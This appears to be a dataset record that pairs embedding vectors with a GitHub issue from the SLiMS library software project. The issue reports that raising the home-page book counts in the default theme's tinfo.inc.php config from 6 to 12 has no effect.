0.013230361044406891, 0.02038971148431301, -0.015088682062923908, -0.02580919861793518, -0.012378938496112823, -0.033138833940029144, 0.004675418604165316, 0.0037499594036489725, 0.007810873445123434, -0.010476195253431797, -0.0002193337568314746, -0.015547709539532661, 0.010861185379326344, 0.004978968761861324, 0.011105506680905819, -0.004708734806627035, 0.020404517650604248, -0.004231198225170374, 0.005956253502517939, 0.013844865374267101, -0.010787148959934711, 0.03497494384646416, 0.029570262879133224, -0.013548718765377998, -0.0029873813036829233, -0.03737373277544975, 0.004360762424767017, 0.017679966986179352, 0.008647488430142403, -0.011105506680905819, -0.005797074642032385, -0.04033520072698593, 0.00505670765414834, 0.011557131074368954, -0.028637399896979332, 0.001013377564959228, -0.004553257953375578, 0.0017343099461868405, -0.018983013927936554, 0.01858321577310562, 0.0016741551226004958, 0.010002359747886658, 0.0039868769235908985, -0.020212022587656975, 0.014526003040373325, -0.0007593390182591975, 0.011335020884871483, -0.007995964959263802, -0.024713454768061638, 0.014955416321754456, 0.01388928759843111, -0.0037333013024181128, 0.00978765357285738, -0.007699818350374699, -0.036218758672475815, 0.009735827334225178, -0.00574524886906147, 0.026253418996930122, -0.00995053444057703, 0.0031835786066949368, 0.021159691736102104, -0.004838299006223679, 0.009972745552659035, -0.00683358870446682, 0.004556959494948387, -0.01329699344933033, 0.002793035004287958, -0.006145047023892403, -0.0010855633299797773, 0.015022048726677895, -0.01929396763443947, 0.001433535828255117, -0.015295985154807568, -0.007862699218094349, 0.004131248686462641, 0.0001900661300169304, 0.017102479934692383, -0.01677672006189823, -0.01401514932513237, -0.010861185379326344, 0.008877001702785492, 0.00393875315785408, -0.01450379192829132, -0.0048012807965278625, -0.004090528469532728, -0.0031965351663529873, 0.014622250571846962, -0.0055971755646169186, 0.0010615013306960464, -0.010039377957582474, 0.02478749118745327, -0.01670268177986145, 0.004116441123187542, -0.03025140054523945, 0.02520209737122059, -0.0042904275469481945, -0.019279159605503082, -0.003342757700011134, 0.01625846140086651, -0.003997982479631901, -0.007825681008398533, -0.01760593056678772, -0.029496226459741592, 0.011875488795340061, -0.020863546058535576, 0.0015205290401354432, -0.008055194281041622, 0.01087599340826273, 0.008225479163229465, 0.01138684619218111, 0.02228504978120327, 0.00808480940759182, -0.009165745228528976, 0.014585232362151146, 0.023440023884177208, 0.01383005827665329, 0.006418982986360788, 0.014600039459764957, 0.0029651704244315624, -0.003744406858459115, 0.013541314750909805, 0.023499252274632454, 0.006056203041225672, 0.021515069529414177, 0.000010201738405157812, 0.013208149932324886, 0.02381020598113537, -0.00903247855603695, 0.010838975198566914, 0.004197881557047367, 0.009454487822949886, 0.00034380797296762466, 0.0020100967958569527, 0.016065966337919235, 0.012630662880837917, 0.022670041769742966, 0.008921423926949501, -0.0037129411939531565, 0.0009615517919883132, 0.0016889625694602728, 0.0022414615377783775, 0.000922682520467788, 0.007588763255625963, 0.0010402158368378878, -0.007188964635133743, 0.005537946242839098, 0.009913516230881214, -0.019308775663375854, 0.01628807745873928, -0.0030780762899667025, 0.0012614005245268345, 0.011993947438895702, -0.022640427574515343, 0.01830187626183033, 0.011401654221117496, 0.0036759227514266968, -0.01350429654121399, -0.008677102625370026, -0.0002824963303282857, 0.01821303181350231, 0.006078414153307676, -0.026742061600089073, -0.01760593056678772, -0.018864555284380913, 0.0025005899369716644, 0.0001229703484568745, -0.003935051150619984, -0.000020389015844557434, -0.012571433559060097, -0.002607943257316947, -0.006752148270606995, -0.0006519858143292367, -0.014103993773460388, 0.032931528985500336, -0.0003308515588287264, 0.0028078423347324133, 0.024772685021162033, 0.017265360802412033, -0.015147911384701729, 0.009328626096248627, 0.007455497048795223, 0.028045106679201126, -0.00577486352995038, -0.00853643286973238, 0.0007135288324207067, -0.006870606914162636, 0.0017102480633184314, -0.037610650062561035, 0.015384828671813011, -0.018494371324777603, -0.002759718568995595, 0.00972842425107956, 0.016465764492750168, -0.00824769027531147, 0.012867581099271774, -0.0240471251308918, 0.007403671275824308, 0.0129490215331316, 0.01945684850215912, 0.019101472571492195, 0.00479017524048686, -0.0028892827685922384, 0.005756354425102472, 0.007070505991578102, 0.0066336896270513535, 0.006256102118641138, 0.018331490457057953, -0.007511024363338947, 0.004208987113088369, -0.014992434531450272, -0.005967359058558941, -0.014363122172653675, 0.01760593056678772, 0.018361104652285576, -0.003118796506896615, -0.023129068315029144, 0.01405216846615076, 0.019930683076381683, 0.006019184831529856, -0.010320717468857765, -0.020123178139328957, 0.018361104652285576, -0.020922774448990822, -0.007559148594737053, -0.010268892161548138, 0.0019804821349680424, -0.009943130426108837, 0.009528525173664093, -0.023706555366516113, 0.008351340889930725, 0.00514925317838788, 0.011075892485678196, 0.010268892161548138, 0.031125033274292946, 0.01682114042341709, 0.0008310620905831456, -0.015414443798363209, 0.00968400202691555, 0.025542665272951126, -0.0013058225158602, -0.00958035048097372, -0.01553290244191885, 0.005915533285588026, 0.005623088218271732, 0.0067595518194139, 0.018568407744169235, 0.020819123834371567, 0.0061339414678514, -0.013052672147750854, -0.02117449976503849, 0.01422245241701603, 0.0031780258286744356, 0.02129295840859413, 0.025824004784226418, -0.005304730497300625, -0.009447084739804268, -0.004382973536849022, -0.004590276163071394, -0.004660611040890217, 0.002876326208934188, 0.010120818391442299, -0.011749626137316227, 0.02179640904068947, 0.021811215206980705, -0.001967525575309992, 0.014829553663730621, 0.010624268092215061, -0.006970556452870369, 0.0024543169420212507, 0.019604921340942383, 0.016835948452353477, 0.014274278655648232, 0.010120818391442299, -0.010439176112413406, -0.02052297629415989, 0.019501270726323128, 0.007129735313355923, 0.008684506639838219, 0.012423360720276833, -0.0036481590941548347, -0.018449949100613594, 0.015621746890246868, 0.000601085543166846, 0.02495037205517292, 0.00659667095169425, 0.008173652924597263, -0.00946189183741808, 0.0005048378370702267, 0.014126204885542393, 0.026519950479269028, -0.00032529880991205573, -0.001614000299014151, -0.0012854624073952436, 0.013415452092885971, -0.012630662880837917, -0.012364131398499012, 0.02080431580543518, 0.0038128907326608896, -0.015355214476585388, -0.002554266480728984, -0.004605083726346493, 0.0016732297372072935, 0.009602561593055725, -0.004849404562264681, -0.004531046841293573, 0.021115271374583244, 0.017531894147396088, -0.01818341761827469, 0.0033242483623325825, -0.0009249961585737765, -0.008077405393123627, -0.0028430097736418247, -0.0008352266740985215, 0.00634124455973506, 0.0022173996549099684, -0.011890295892953873, 0.01858321577310562, -0.013496892526745796, 0.00781827699393034, -0.01649538055062294, -0.0035796749871224165, 0.004097932018339634, 0.004349656868726015, -0.0037370030768215656, -0.022225821390748024, -0.02015279419720173, 0.019975105300545692, -0.014518599025905132, 0.006989065557718277, -0.02536497823894024, -0.0020286059007048607, -0.018242646008729935, 0.00847720354795456, 0.012549222446978092, 0.005204780958592892, -0.002872624434530735, 0.0014603742165490985, -0.020774701610207558, 0.00203600968234241, 0.015932701528072357, 0.01542925089597702, 0.007403671275824308, 0.0047383494675159454, -0.004560661502182484, 0.002376578515395522, -0.023440023884177208, 0.005297326948493719, 0.012941617518663406, 0.005278817843645811, 0.004619890823960304, 0.00847720354795456, -0.0016436150763183832, 0.009491506963968277, 0.011372039094567299, 0.014674076810479164, 0.010491002351045609, -0.018805325031280518, -0.0060265883803367615, 0.0068224831484258175, 0.004608785267919302, -0.012341920286417007, -0.005811881739646196, -0.013526507653295994, -0.006200574804097414, 0.0002709281106945127, -0.014674076810479164, -0.0008639158913865685, -0.011993947438895702, 0.02429884858429432, 0.0008204193436540663, 0.007207474205642939, 0.021722370758652687, 0.01303046103566885, 0.013000846840441227, -0.010120818391442299, -0.016110388562083244, 0.010483598336577415, -0.014533407054841518, -0.0031632184982299805, -0.005574964452534914, -0.01438533328473568, -0.0411347970366478, -0.006111730821430683, 0.005334345158189535, -0.007596166804432869, -0.004579170607030392, 0.006396771874278784, 0.00030771509045735, -0.018849747255444527, 0.004686524160206318, 0.006407877430319786, 0.009558139368891716, 0.012356727384030819, -0.00423860177397728, 0.0035630168858915567, 0.0021748284343630075, 0.013911498710513115, 0.01850917749106884, -0.006289418786764145, 0.011209158226847649, -0.008092212490737438, 0.012423360720276833, 0.01434091106057167, -0.012408552691340446, -0.013141516596078873, 0.00906949769705534, -0.034323420375585556, -0.019116278737783432, 0.013778232038021088, 0.01682114042341709, 0.022314665839076042, 0.013304397463798523, -0.012238268740475178, -0.0006802122807130218, -0.013585736975073814, 0.023913858458399773, 0.0038128907326608896, 0.0019194018095731735, -0.012341920286417007, 0.014725902117788792, -0.011135121807456017, -0.0025912849232554436, -0.0039313496090471745, 0.056001368910074234, -0.0039313496090471745, 0.028637399896979332, -0.0017731792759150267, 0.001188289257697761, -0.00073851621709764, -0.0050604091957211494, -0.007470304146409035, 0.004468115512281656, 0.0029318537563085556, -0.005830391310155392, 0.001240114914253354, 0.01732459105551243, -0.008662295527756214, -0.0030817780643701553, -0.0005765609093941748, 0.004286725539714098, -0.006918730679899454, 0.0005057632806710899, -0.016969215124845505, -0.02277369238436222, 0.009432277642190456, 0.03269461169838905, -0.015221947804093361, -0.003611140651628375, -0.006333841010928154, 0.0168655626475811, -0.012134617194533348, 0.01175703015178442, -0.0077886623330414295, 0.030266208574175835, -0.008336533792316914, -0.011505304835736752, -0.004664313048124313, 0.007966350764036179, 0.022062940523028374, -0.0014890633756294847, 0.017161710187792778, 0.0015825347509235144, -0.0012845370220020413, -0.004823491908609867, 0.007266703527420759, -0.025009602308273315, 0.004060913808643818, 0.004116441123187542, 0.004638399928808212, -0.01132761687040329, 0.004553257953375578, 0.01313411258161068, 0.014666672796010971, 0.005101129412651062, 0.004653207492083311, -0.008854790590703487, 0.016362113878130913, -0.009469295851886272, 0.017087673768401146, 0.011720011942088604, -0.017043251544237137, -0.01645095832645893, -0.016095580533146858, -0.01175703015178442, -0.009084304794669151, -0.008277304470539093, -0.015022048726677895, -0.021529875695705414, 0.003427899908274412, 0.014970223419368267, 0.024861527606844902, -0.009928323328495026, 0.03337575122714043, 0.003431601682677865, 0.0055712624453008175, -0.019604921340942383, -0.0009717318462207913, -0.0014353867154568434, -0.01066869031637907, 0.017665158957242966, 0.007229684852063656, 0.011505304835736752, 0.009410066530108452, -0.0013280335115268826, -0.0074480934999883175, 0.018272260203957558, -0.005693423096090555, -0.007248194422572851, -0.00711862975731492, -0.01126098446547985, 0.0010753832757472992, -0.02003433369100094, 0.009676598012447357, 0.020419325679540634, -0.000771370017901063, -0.013274782337248325, -0.010676094330847263, 0.018035342916846275, -0.00174171372782439, 0.00025681484839878976, -0.010350332595407963, -0.00017791947175282985, 0.005315836053341627, 0.017857655882835388, 0.01372640673071146, -0.0187164805829525, 0.01099445205181837, 0.024269234389066696, 0.008677102625370026, 0.011357231996953487, -0.014481580816209316, 0.0008486458100378513, 0.0055712624453008175, 0.0218704454600811, -0.011720011942088604, -0.015059067867696285, 0.013911498710513115, 0.02323272079229355, 0.006981662008911371, -0.005867409519851208, 0.0019934384617954493, 0.01813899539411068, 0.0041756704449653625, -0.016510186716914177, -0.014681479893624783, 0.03769949451088905, 0.01879051700234413, 0.012297498062252998, -0.008921423926949501, -0.0076109739020466805, 0.01711728796362877, 0.0039683678187429905, 0.001685260678641498, -0.013422856107354164, -0.012408552691340446, 0.017087673768401146, 0.009535928256809711, -0.01957530714571476, 0.01204577274620533, -0.010305910371243954, 0.02536497823894024, 0.02175198681652546, -0.003228000598028302, -0.004901230335235596, 0.03980213776230812, -0.008425378240644932, 0.006441194098442793, -0.016065966337919235, 0.025513051077723503, -0.011186947114765644, 0.018316682428121567, -0.02256638929247856, -0.0055527533404529095, 0.004079422913491726, 0.025883235037326813, 0.014614847488701344, 0.005545349791646004, -0.002802289556711912, -0.005996973719447851, 0.00010654345533112064, 0.01559213176369667, 0.003786977846175432, -0.01204577274620533, 0.004716138821095228, 0.0014751815469935536, 0.0055342442356050014, 0.01097964495420456, 0.005841496866196394, 0.0016963662346825004, 0.0014279830502346158, -0.0036574136465787888, 0.01520714070647955, 0.0003634739841800183, -0.03284268453717232, 0.0014455667696893215, 0.00037643039831891656, -0.00869931373745203, 0.014829553663730621, 0.01340064499527216, 0.014577828347682953, -0.0019323582528159022, 0.007944139651954174, 0.005471312906593084, 0.014674076810479164, -0.0036389045417308807, -0.015310792252421379, 0.017502278089523315, 0.04649505391716957, 0.0005710081313736737, -0.008558643981814384, -0.004016491584479809, 0.01818341761827469, -0.008588259108364582, -0.0005247351946309209, -0.022803308442234993, 0.0013465427327901125, -0.004035000689327717, -0.007751643657684326, 0.010328121483325958, 0.0076183779165148735, 0.005064111202955246, 0.01584385707974434, -0.00443109730258584, 0.006544845644384623, -0.028489327058196068, -0.00824769027531147, 0.01366717740893364 ]
null
null
null
null
null
null
null
null
null
[ "slims", "slims9_bulian" ]
**Describe the bug** Change template/default/tinfo.inc.php to display many books instead of 6 default. ``` $sysconf['template']['classic_popular_collection'] = 1; $sysconf['template']['classic_popular_collection_item'] = 6; // change to 12 doesn't work $sysconf['template']['classic_new_collection'] = 1; $sysconf['template']['classic_new_collection_item'] = 6; // change to 12 doesn't work ``` I cannot change the quantity of books in home page. Theme Default. How can I change this behaviour?
Quality of books on home page (default theme) cannot change?
https://api.github.com/repos/slims/slims9_bulian/issues/196/comments
2
2023-07-13T10:59:19
2023-08-19T00:29:15Z
https://github.com/slims/slims9_bulian/issues/196
1,802,767,321
196
false
This is a GitHub Issue repo:slims9_bulian owner:slims Title : Quality of books on home page (default theme) cannot change? Issue date: --- start body --- **Describe the bug** Change template/default/tinfo.inc.php to display many books instead of 6 default. ``` $sysconf['template']['classic_popular_collection'] = 1; $sysconf['template']['classic_popular_collection_item'] = 6; // change to 12 doesn't work $sysconf['template']['classic_new_collection'] = 1; $sysconf['template']['classic_new_collection_item'] = 6; // change to 12 doesn't work ``` I cannot change the quantity of books in home page. Theme Default. How can I change this behaviour? --- end body ---
682
[ -0.011443388648331165, 0.016640594229102135, -0.013843321241438389, 0.019231250509619713, 0.012261908501386642, 0.003371428931131959, 0.005443556234240532, 0.03789032995700836, -0.0002880714018829167, 0.012794344685971737, -0.024730434641242027, -0.004231669940054417, -0.037254586815834045, 0.011506962589919567, -0.0125479931011796, -0.011697686277329922, -0.054928265511989594, 0.009679199196398258, 0.005876657087355852, 0.011125517077744007, -0.02978459745645523, 0.004871387034654617, -0.0155359897762537, 0.026780707761645317, 0.00024535736883990467, 0.013104269281029701, -0.029577981680631638, -0.009957337751984596, -0.01034673023968935, 0.01902463287115097, 0.020200759172439575, 0.013533396646380424, -0.011189091019332409, -0.0070607298985123634, -0.016116105020046234, -0.03038855455815792, 0.009377221576869488, 0.06010957807302475, -0.021043119952082634, 0.029514405876398087, -0.02654230408370495, -0.014312182553112507, 0.007867329753935337, 0.0001733395183691755, 0.014041991904377937, -0.019342506304383278, 0.01193608995527029, -0.01856371946632862, -0.009567944332957268, -0.0027118446305394173, 0.004331004805862904, -0.004907147493213415, -0.0016201534308493137, -0.01842067763209343, -0.062048595398664474, -0.02713036723434925, 0.033535487949848175, 0.00016278518887702376, -0.01737169921398163, -0.0006109100650064647, -0.0016042598290368915, 0.0039336648769676685, 0.017244551330804825, 0.006218369118869305, -0.01451085228472948, 0.0013380420859903097, -0.04764899984002113, 0.030150150880217552, -0.03108787164092064, 0.03502948582172394, 0.025652263313531876, 0.027019111439585686, 0.017069721594452858, 0.06522731482982635, 0.04516959935426712, -0.030356766656041145, 0.04373917356133461, -0.01888159103691578, -0.04876155033707619, 0.06115855649113655, -0.03677777945995331, 0.029434937983751297, -0.03410765528678894, -0.009369274601340294, 0.046504661440849304, 0.008534860797226429, -0.014018150977790356, -0.07997657358646393, -0.05556400865316391, 0.010012964718043804, -0.02986406534910202, -0.007231585681438446, 0.055913668125867844, -0.017943868413567543, 0.015400893986225128, 0.019310718402266502, -0.0016787609783932567, 0.030674638226628304, -0.0026284032501280308, -0.026097282767295837, -0.00414822855964303, -0.04516959935426712, -0.02107490785419941, -0.046282149851322174, 0.062334682792425156, 0.007760047912597656, 0.003907837904989719, -0.04971516504883766, -0.013326779939234257, 0.042340539395809174, 0.03183487057685852, -0.042944494634866714, -0.0492701455950737, 0.010005018673837185, -0.039225392043590546, 0.02697143144905567, 0.004466100130230188, 0.014836670830845833, -0.013811534270644188, 0.001970805926248431, -0.02145635336637497, -0.020359694957733154, 0.005904470570385456, -0.00706867640838027, -0.058710940182209015, -0.006281943526118994, -0.00944079551845789, 0.005904470570385456, 0.022251034155488014, -0.01803923025727272, -0.010275209322571754, 0.02903759852051735, 0.012937386520206928, -0.031564678996801376, 0.005451503209769726, -0.03100840374827385, 0.011880462989211082, 0.030134256929159164, -0.011999664828181267, -0.03684135526418686, -0.01644987054169178, -0.03410765528678894, 0.012158600613474846, -0.02220335230231285, -0.03205738216638565, 0.0000200532467715675, -0.01888159103691578, 0.006019699387252331, 0.013167844153940678, 0.035283781588077545, -0.024380775168538094, -0.05190848186612129, -0.01530553214251995, 0.03719101473689079, -0.0012744676787406206, 0.015742605552077293, -0.014248608611524105, 0.0010738110868260264, 0.02471454069018364, 0.012381110340356827, -0.024047009646892548, 0.03115144744515419, -0.00415220158174634, -0.012794344685971737, -0.0020045796409249306, 0.001157252467237413, 0.00486741354689002, 0.037095651030540466, -0.020947758108377457, 0.02426951937377453, 0.002403906313702464, 0.009520263411104679, -0.043103430420160294, 0.02924421615898609, -0.0009039482101798058, 0.002165502402931452, 0.020439162850379944, -0.04288091883063316, 0.005507130641490221, -0.021408673375844955, -0.01757831685245037, 0.02093186415731907, 0.005352168343961239, -0.0024456270039081573, 0.06179429963231087, 0.03792211785912514, 0.023379478603601456, 0.006909740623086691, -0.0021972896065562963, 0.013382406905293465, -0.0037429416552186012, 0.015607510693371296, 0.003820423036813736, 0.0008498106617480516, 0.006579948589205742, -0.026891963556408882, -0.026017814874649048, -0.03804926574230194, -0.004319084342569113, 0.014256554655730724, 0.020868290215730667, -0.001420490094460547, -0.05070056766271591, -0.03480697423219681, -0.0039336648769676685, 0.07533564418554306, -0.0028350199572741985, 0.030277298763394356, -0.0005527990870177746, -0.007430255878716707, 0.00959178525954485, 0.012651301920413971, 0.02328411675989628, 0.021106693893671036, -0.02933957614004612, 0.026431048288941383, -0.006361411418765783, 0.0168154239654541, 0.022409969940781593, -0.02585887908935547, -0.012818184681236744, -0.0394161157310009, 0.004847546573728323, -0.02676481381058693, -0.02409468963742256, -0.02441256307065487, 0.008288510143756866, 0.009313646703958511, -0.0212179496884346, -0.006929607596248388, 0.015496255829930305, -0.024317201226949692, -0.010863272473216057, 0.028306493535637856, 0.008185201324522495, 0.035220205783843994, -0.0344255268573761, -0.023141074925661087, -0.004875360522419214, -0.0020979545079171658, 0.02881508879363537, 0.060967832803726196, -0.014939979650080204, 0.0005443556583486497, 0.022171566262841225, 0.013032748363912106, 0.012635407969355583, -0.03264544531702995, -0.003055543638765812, -0.001702601439319551, 0.003520431462675333, -0.008264669217169285, 0.01554393582046032, 0.030420340597629547, -0.009011668153107166, -0.0008110700291581452, 0.00018190716218668967, 0.02554100751876831, -0.0037489018868654966, 0.0054991841316223145, 0.001769155845977366, 0.022107990458607674, -0.04249947518110275, -0.0024913211818784475, 0.0019817326683551073, -0.00494688143953681, 0.03170772269368172, -0.02485758252441883, 0.022632479667663574, -0.0017890228191390634, 0.04679074510931969, -0.07063113898038864, -0.022012630477547646, 0.02426951937377453, 0.009043456055223942, -0.0316600427031517, 0.014534693211317062, -0.006206449121236801, 0.007024968974292278, -0.02781379222869873, 0.005439583212137222, 0.051495250314474106, 0.010148060508072376, 0.02137688547372818, 0.0038243962917476892, 0.03951147943735123, 0.009258019737899303, -0.010998368263244629, -0.015933329239487648, -0.048697974532842636, -0.009901709854602814, -0.038462501019239426, 0.004176042042672634, -0.015949223190546036, 0.03283616900444031, 0.022473543882369995, 0.01986699365079403, -0.0005458456580527127, -0.021567609161138535, 0.0017979629337787628, 0.005308460909873247, -0.013589023612439632, -0.007442175876349211, -0.028862768784165382, -0.024730434641242027, -0.003401229390874505, 0.02569994330406189, 0.00821698922663927, -0.0532117560505867, -0.03302689269185066, 0.013279099017381668, -0.05190848186612129, -0.010243422351777554, -0.05197205767035484, 0.0062263160943984985, -0.0231887549161911, 0.035124845802783966, 0.02002592943608761, -0.001520818448625505, -0.016878997907042503, -0.001713528297841549, -0.048094019293785095, 0.0011254652636125684, -0.019374292343854904, -0.010910953395068645, -0.01896105892956257, -0.013883055187761784, 0.011975823901593685, -0.021345099434256554, 0.0001436632010154426, -0.00152479181997478, -0.01741938106715679, -0.004156175069510937, -0.009806348010897636, 0.03439373895525932, -0.04068760573863983, -0.008495126850903034, 0.019358398392796516, -0.05152703449130058, -0.0038363165222108364, -0.008201095275580883, 0.006464719772338867, 0.006301810499280691, -0.014645948074758053, 0.020264334976673126, -0.04167300835251808, -0.004863440059125423, 0.0014155233511701226, 0.04615500196814537, -0.036046672612428665, 0.0010499706258997321, 0.007072649896144867, 0.007382574956864119, 0.045296747237443924, -0.01954912208020687, 0.001317181740887463, -0.03046802245080471, -0.0046647703275084496, 0.016084318980574608, -0.02948261983692646, 0.003816449549049139, -0.050382696092128754, -0.0014850578736513853, 0.038780372589826584, 0.02713036723434925, 0.04208623990416527, 0.01705382764339447, 0.014947926625609398, -0.025954240933060646, -0.026891963556408882, -0.049238357692956924, 0.016481658443808556, -0.02296624518930912, 0.03556986525654793, -0.02449203096330166, 0.025747625157237053, -0.023252330720424652, 0.01357313059270382, -0.02333179861307144, -0.009186497889459133, 0.01751474291086197, 0.018849804997444153, 0.01691078580915928, 0.00032134863431565464, 0.013549289666116238, -0.018849804997444153, 0.004438286647200584, -0.007438202854245901, 0.03795390576124191, 0.006266050040721893, -0.012691035866737366, -0.017165083438158035, 0.017451167106628418, -0.04933372139930725, -0.013533396646380424, -0.015901541337370872, -0.04485172778367996, -0.045964278280735016, 0.012476472184062004, -0.03614203631877899, 0.043770961463451385, -0.02827470563352108, 0.00706867640838027, -0.015170436352491379, 0.0070607298985123634, 0.021996736526489258, 0.04176836833357811, -0.01568697951734066, -0.012500313110649586, 0.005125684663653374, -0.04396168515086174, 0.054769329726696014, -0.0036912874784320593, 0.03099251165986061, 0.03706386312842369, 0.050509847700595856, -0.04796687141060829, 0.053402479737997055, -0.018929272890090942, -0.0019757726695388556, 0.038398925215005875, 0.010354677215218544, -0.042404111474752426, 0.00944079551845789, 0.017610102891921997, 0.011101676151156425, 0.008765317499637604, 0.03283616900444031, 0.04669538140296936, 0.02113848179578781, -0.014502905309200287, 0.053466055542230606, -0.004640929866582155, -0.004954828415066004, 0.005721694324165583, 0.003083357587456703, 0.00784348975867033, -0.02296624518930912, 0.009679199196398258, -0.020264334976673126, 0.022568905726075172, -0.01352544967085123, 0.03531556949019432, 0.03693671524524689, -0.019994143396615982, -0.007243506144732237, -0.022616585716605186, -0.012182440608739853, 0.003623739816248417, 0.03318582847714424, -0.02220335230231285, -0.02425362728536129, -0.02380860596895218, -0.033249400556087494, 0.05025554820895195, -0.016704168170690536, 0.0022688107565045357, 0.006361411418765783, 0.02455560490489006, 0.012404951266944408, -0.029291896149516106, 0.0009531190735287964, 0.031199127435684204, -0.010545400902628899, -0.02334769070148468, 0.0010559307411313057, -0.013565183617174625, -0.005737587809562683, 0.00036729106795974076, -0.01567903161048889, -0.015051234513521194, 0.010569240897893906, 0.001491017872467637, 0.00003268741420470178, 0.014463171362876892, 0.01007653959095478, -0.018134592100977898, 0.009432848542928696, 0.02941904589533806, -0.0004398055898491293, -0.027702536433935165, -0.03132627531886101, -0.00634949142113328, 0.047267552465200424, -0.016561126336455345, -0.007732233963906765, 0.019278930500149727, 0.016251200810074806, -0.025048306211829185, 0.03843071311712265, 0.020359694957733154, 0.03595131263136864, 0.013128110207617283, 0.007020995952188969, -0.010561293922364712, -0.012881758622825146, -0.028751514852046967, -0.04303985461592674, 0.026780707761645317, 0.011308292858302593, -0.01527374517172575, -0.01600485108792782, -0.012142706662416458, 0.0039952523075044155, 0.020280227065086365, 0.016720062121748924, 0.023967541754245758, 0.008344137109816074, -0.025652263313531876, 0.03499769791960716, 0.0023264249321073294, -0.005789242219179869, -0.002356225624680519, -0.07158475369215012, -0.0023979463148862123, -0.02940315194427967, 0.00006121517799329013, -0.01781672053039074, 0.05480111762881279, 0.010974527336657047, -0.016640594229102135, -0.0026303899940103292, 0.00026447937125340104, 0.02447613701224327, -0.0007330920780077577, 0.020280227065086365, 0.014049937948584557, -0.00458927545696497, 0.04396168515086174, -0.008614328689873219, -0.008042159490287304, 0.010092432610690594, 0.009861975908279419, 0.01254004705697298, -0.0047601317055523396, -0.013962523080408573, 0.03398050740361214, -0.024047009646892548, -0.024905264377593994, -0.0011592390947043896, -0.011618218384683132, 0.012238068506121635, -0.043389514088630676, -0.03766782209277153, -0.01585386134684086, 0.024952944368124008, -0.02250533178448677, 0.002266824012622237, 0.028322387486696243, 0.005805135704576969, 0.009695093147456646, -0.03754067048430443, 0.028449535369873047, -0.0013062548823654652, -0.012683088891208172, 0.005526997614651918, 0.007867329753935337, 0.012691035866737366, -0.004958801902830601, -0.01288970559835434, 0.01451085228472948, 0.004370738752186298, 0.031183233484625816, 0.014502905309200287, -0.006540214642882347, 0.006798485293984413, -0.009846081957221031, -0.0014781043864786625, -0.01201555784791708, -0.054832905530929565, 0.002519134897738695, 0.031215021386742592, 0.02743234485387802, -0.008979881182312965, -0.012691035866737366, 0.024301307275891304, 0.002574762562289834, -0.0018645174568518996, -0.00592831103131175, 0.025254923850297928, -0.006138901226222515, -0.033471912145614624, -0.013318832963705063, 0.00830440316349268, 0.01246852520853281, -0.01095068734139204, 0.02242586389183998, 0.019215356558561325, 0.00022648373851552606, -0.0015039314748719335, 0.006353464908897877, 0.03458446264266968, -0.004875360522419214, 0.005606465972959995, 0.0286402590572834, 0.017006147652864456, 0.014272448606789112, 0.003301894525066018, 0.007807728834450245, -0.005709774326533079, -0.01721276342868805, 0.003945584874600172, 0.017753146588802338, -0.010823538526892662, -0.03100840374827385, -0.004108494613319635, 0.03474339842796326, 0.018976952880620956, 0.0012098998995497823, 0.029132960364222527, -0.02045505680143833, 0.004366765264421701, 0.04288091883063316, -0.02781379222869873, 0.024507924914360046, -0.0055945455096662045, 0.0020502738188952208, 0.008256723172962666, 0.015941275283694267, 0.029577981680631638, 0.03645990788936615, -0.015981009230017662, 0.04094190150499344, -0.03439373895525932, -0.005888577084988356, 0.018611399456858635, -0.008805051445960999, -0.022457649931311607, 0.00013435054279398173, -0.02250533178448677, -0.024746328592300415, -0.015631351619958878, -0.007243506144732237, -0.024507924914360046, -0.00010926846880465746, 0.00864611566066742, -0.019835207611322403, 0.030801787972450256, 0.00010063873924082145, -0.027638962492346764, -0.04040151834487915, -0.0255569014698267, 0.004934961441904306, 0.040433306246995926, -0.020979546010494232, 0.002177422633394599, -0.002021466614678502, -0.016704168170690536, 0.02622443251311779, 0.00439855270087719, -0.004462127108126879, -0.007247479632496834, -0.010195741429924965, 0.01926303841173649, 0.014248608611524105, 0.008201095275580883, -0.02077292837202549, 0.036269184201955795, 0.014018150977790356, -0.012905599549412727, -0.03433016687631607, -0.0077203139662742615, 0.004907147493213415, -0.026621771976351738, 0.019151782616972923, 0.007243506144732237, 0.013096322305500507, -0.030229618772864342, 0.020709354430437088, 0.006599815562367439, 0.037032078951597214, 0.00989376287907362, 0.00012863878509961069, -0.02342716045677662, -0.0019221316324546933, -0.005062110256403685, 0.027638962492346764, 0.015798233449459076, -0.025223135948181152, -0.019692163914442062, -0.011499016545712948, 0.012452632188796997, 0.034902334213256836, -0.0011046049185097218, -0.016656488180160522, 0.008518966846168041, -0.02439666911959648, 0.0206934604793787, 0.0424358993768692, 0.01007653959095478, 0.025636369362473488, 0.017149189487099648, 0.017864400520920753, 0.004410472698509693, 0.005526997614651918, -0.029927639290690422, 0.0019261051202192903, 0.011244718916714191, 0.009242125786840916, 0.006309757474809885, -0.024968838319182396, -0.0033515619579702616, -0.04110083729028702, 0.0231887549161911, 0.016012797132134438, 0.010028858669102192, -0.0028608471620827913, -0.0005269719986245036, 0.012555940076708794, 0.007283240091055632, -0.0008200102020055056, -0.00112347851973027, 0.006754777859896421, 0.03247061371803284, -0.00040230664308182895, 0.007875276729464531, -0.0006908747018314898, -0.011411601677536964, -0.05222635343670845, -0.004915094468742609, -0.004783972166478634, -0.026192644611001015, -0.013803587295114994, -0.013390353880822659, -0.010148060508072376, 0.0021198082249611616, 0.020296121016144753, -0.04183194413781166, 0.02409468963742256, 0.006909740623086691, -0.03267723321914673, 0.04564640671014786, 0.04478815197944641, 0.012317536398768425, -0.03483876213431358, 0.03461625054478645, 0.006043539848178625, -0.004271403886377811, -0.02658998593688011, -0.031024297699332237, 0.00521309906616807, 0.015583670698106289, -0.021964948624372482, 0.020566312596201897, -0.0030396501533687115, 0.010211635380983353, -0.015973063185811043, -0.006568028125911951, 0.03483876213431358, 0.00282508647069335, -0.0009625558741390705, -0.00432305783033371, 0.015289639122784138, -0.028179343789815903, 0.01106194220483303, -0.0067229908891022205, 0.019898781552910805, 0.012428791262209415, 0.016577020287513733, -0.00375287514179945, -0.032931528985500336, 0.01413735281676054, -0.0007514690514653921, 0.029959427192807198, -0.0026979378890246153, 0.02690785750746727, -0.024746328592300415, -0.03843071311712265, 0.026033708825707436, -0.01538500003516674, -0.0014214834664016962, 0.023315904662013054, -0.03655526787042618, 0.0022052363492548466, 0.004839599598199129, -0.06176251173019409, -0.03261365741491318, -0.01568697951734066, -0.025954240933060646, 0.021949054673314095, -0.014169140718877316, 0.010068592615425587, -0.002459533978253603, 0.004042933229357004, 0.02387217991054058, 0.0004075217293575406, -0.0010767910862341523, -0.001476117642596364, 0.013128110207617283, 0.006969341542571783, -0.007724287454038858, -0.006532267667353153, 